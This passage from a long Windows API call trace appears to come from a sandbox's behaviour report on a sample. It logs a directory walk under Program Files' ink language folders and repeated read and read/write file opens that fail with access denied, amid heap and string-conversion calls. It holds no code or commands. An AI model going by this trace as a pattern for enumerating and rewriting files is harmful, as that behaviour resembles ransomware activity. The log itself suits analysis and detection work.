dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0085.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0085.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0085.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0085.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0085.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0085.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0085.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0085.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0085.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0085.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0085.952] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.952] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.953] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.953] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0085.953] AreFileApisANSI () returned 1 [0085.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN", lpUsedDefaultChar=0x0) returned 57 [0085.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0085.953] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.953] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0085.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0085.953] AreFileApisANSI () returned 1 [0085.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0085.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN") returned 57 [0085.953] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.953] GetLastError () returned 0x5 [0085.953] GetLastError () returned 0x5 [0085.953] SetLastError (dwErrCode=0x5) [0085.953] GetLastError () returned 0x5 [0085.953] SetLastError (dwErrCode=0x5) [0085.953] GetLastError () returned 0x5 [0085.953] SetLastError (dwErrCode=0x5) [0085.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0085.954] AreFileApisANSI () returned 1 [0085.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0085.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN") returned 57 [0085.954] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.954] GetLastError () returned 0x5 [0085.954] GetLastError () returned 0x5 [0085.954] SetLastError (dwErrCode=0x5) [0085.954] GetLastError () returned 0x5 [0085.954] SetLastError (dwErrCode=0x5) [0085.954] GetLastError () returned 0x5 [0085.954] SetLastError (dwErrCode=0x5) [0085.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0085.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0085.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0085.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0085.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0085.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0085.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0085.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0085.954] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c97fd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0085.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0085.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0085.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0085.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0085.955] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78790 [0085.955] FindNextFileW (in: hFindFile=0x78790, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c93df, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.955] FindNextFileW (in: hFindFile=0x78790, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e100c60, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e100c60, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e100c60, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0085.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0085.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0085.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0085.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0085.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0085.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0085.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0085.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0085.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46748 [0085.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0085.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0085.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0085.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0085.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0085.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0085.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0085.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0085.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0085.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0085.956] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.956] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.956] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.956] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0085.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.956] AreFileApisANSI () returned 1 [0085.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0085.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0085.956] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.956] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0085.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0085.956] AreFileApisANSI () returned 1 [0085.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x854e0 [0085.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x854e0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui") returned 73 [0085.956] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0085.956] GetFileType (hFile=0x348) returned 0x1 [0085.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x854e0 | out: hHeap=0x20000) returned 1 [0085.957] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.957] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.957] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.957] CloseHandle (hObject=0x348) returned 1 [0085.957] AreFileApisANSI () returned 1 [0085.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x854e0 [0085.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x854e0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui") returned 73 [0085.957] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.957] GetLastError () returned 0x5 [0085.957] GetLastError () returned 0x5 [0085.957] SetLastError (dwErrCode=0x5) [0085.958] GetLastError () returned 0x5 [0085.958] SetLastError (dwErrCode=0x5) [0085.958] GetLastError () returned 0x5 [0085.958] SetLastError (dwErrCode=0x5) [0085.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x854e0 | out: hHeap=0x20000) returned 1 [0085.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0085.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0085.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0085.958] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.958] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.958] FindNextFileW (in: hFindFile=0x78790, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x2e438, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓ᰀ")) returned 0 [0085.958] FindClose (in: hFindFile=0x78790 | out: hFindFile=0x78790) returned 1 [0085.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0085.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0085.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0085.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0085.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0085.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0085.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46748 | out: hHeap=0x20000) returned 1 [0085.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0085.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0085.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0085.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0085.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0085.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0085.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0085.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0085.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0085.959] AreFileApisANSI () returned 1 [0085.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW", lpUsedDefaultChar=0x0) returned 57 [0085.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0085.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0085.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0085.959] AreFileApisANSI () returned 1 [0085.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0085.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW") returned 57 [0085.959] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.959] GetLastError () returned 0x5 [0085.959] GetLastError () returned 0x5 [0085.959] SetLastError (dwErrCode=0x5) [0085.959] GetLastError () returned 0x5 [0085.959] SetLastError (dwErrCode=0x5) [0085.959] GetLastError () returned 0x5 [0085.960] SetLastError (dwErrCode=0x5) [0085.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0085.960] AreFileApisANSI () returned 1 [0085.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a630 [0085.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x6a630, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW") returned 57 [0085.960] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.960] GetLastError () returned 0x5 [0085.960] GetLastError () returned 0x5 [0085.960] SetLastError (dwErrCode=0x5) [0085.960] GetLastError () returned 0x5 [0085.960] SetLastError (dwErrCode=0x5) [0085.960] GetLastError () returned 0x5 [0085.960] SetLastError (dwErrCode=0x5) [0085.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0085.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | 